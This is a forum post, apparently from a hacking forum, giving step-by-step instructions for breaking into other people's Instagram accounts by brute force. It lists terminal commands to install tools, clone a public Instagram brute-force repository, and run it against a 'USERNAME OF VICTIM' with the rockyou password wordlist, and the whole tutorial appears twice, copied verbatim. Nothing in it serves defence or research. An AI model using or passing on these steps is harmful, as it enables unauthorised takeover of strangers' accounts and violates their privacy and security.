SudoDragon
Infinity Member
- Joined
- September 6, 2025
- Messages
- 401
- Reaction score
- 985
- Points
- 93
- Thread Author
- #1
Hello guy,s I'm going to teach you how to access instagram accounts
all you need for that is Kali Linux, Parrot Sec OS or another Linux OS.
(You can download Parrot OS from here https://parrotsec.org and Kali Linux from here https://kali.org)
THAT'S IT! LET'S GO!
Alright so for the purpose of this tutorial I am going to use the technique of brute force...
THESE ARE THE STEPS WE WILL TAKE:
1. Open Terminal
2. apt update && apt ugrade -y
3. apt-get install git
{installing git to clone repo}
4. apt-get install python
{installing python }
5. apt-get install python3
{installing python3}
6. cd Desktop
{changing directory to desktop}
7. git clone https://github.com/P...L0G1C/Instagram (GitHub - Bitwise-01/Instagram-: Bruteforce attack for Instagram.)
{This command will clone the github repo}
AFTER COMPLETION OF THE 7TH COMMAND WE NEED TO RUN:
8. chmod +x Instagram
AFTER THAT RUN:
9. cd Instagram
{changing directory to Instagram}
10. Now run python instagram.py -h to get the help menu
NOW SIMPLY JUST ENTER THIS COMMAND.
python/2/3 instagram.py USERNAME OF VICTIM /Path_of_wordlist_file
[Wordlist file comes already by default in Linux or Parrot just extract rockyou in /usr/share/wordlists and replace the path]
all you need for that is Kali Linux, Parrot Sec OS or another Linux OS.
(You can download Parrot OS from here https://parrotsec.org and Kali Linux from here https://kali.org)
THAT'S IT! LET'S GO!
Alright so for the purpose of this tutorial I am going to use the technique of brute force...
THESE ARE THE STEPS WE WILL TAKE:
1. Open Terminal
2. apt update && apt ugrade -y
3. apt-get install git
{installing git to clone repo}
4. apt-get install python
{installing python }
5. apt-get install python3
{installing python3}
6. cd Desktop
{changing directory to desktop}
7. git clone https://github.com/P...L0G1C/Instagram (GitHub - Bitwise-01/Instagram-: Bruteforce attack for Instagram.)
{This command will clone the github repo}
AFTER COMPLETION OF THE 7TH COMMAND WE NEED TO RUN:
8. chmod +x Instagram
AFTER THAT RUN:
9. cd Instagram
{changing directory to Instagram}
10. Now run python instagram.py -h to get the help menu
NOW SIMPLY JUST ENTER THIS COMMAND.
python/2/3 instagram.py USERNAME OF VICTIM /Path_of_wordlist_file
[Wordlist file comes already by default in Linux or Parrot just extract rockyou in /usr/share/wordlists and replace the path]